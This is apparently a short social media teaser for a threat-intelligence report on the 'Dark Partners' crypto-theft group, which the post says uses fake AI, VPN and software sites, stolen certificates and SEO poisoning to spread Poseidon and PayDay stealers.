Dark Partners: Multi-Platform Crypto Theft via Fake AI, VPN, and Software Sites Dark Partners is a financially motivated cybercrime group active since at least May 2025, orchestrating large-scale cryptocurrency theft campaigns through a sophisticated infrastructure of fake…

Dark Partners turned Google search into a malware buffet 🍽️: 250+ fake AI/VPN/software sites + stolen certs push Poseidon & PayDay stealers. This week’s flavor? 3,900 poisoned domains + AI phish kits. Bon appétit, wallets.

#AlphaHunt #CyberSecurity #SEOpoisoning #Malware
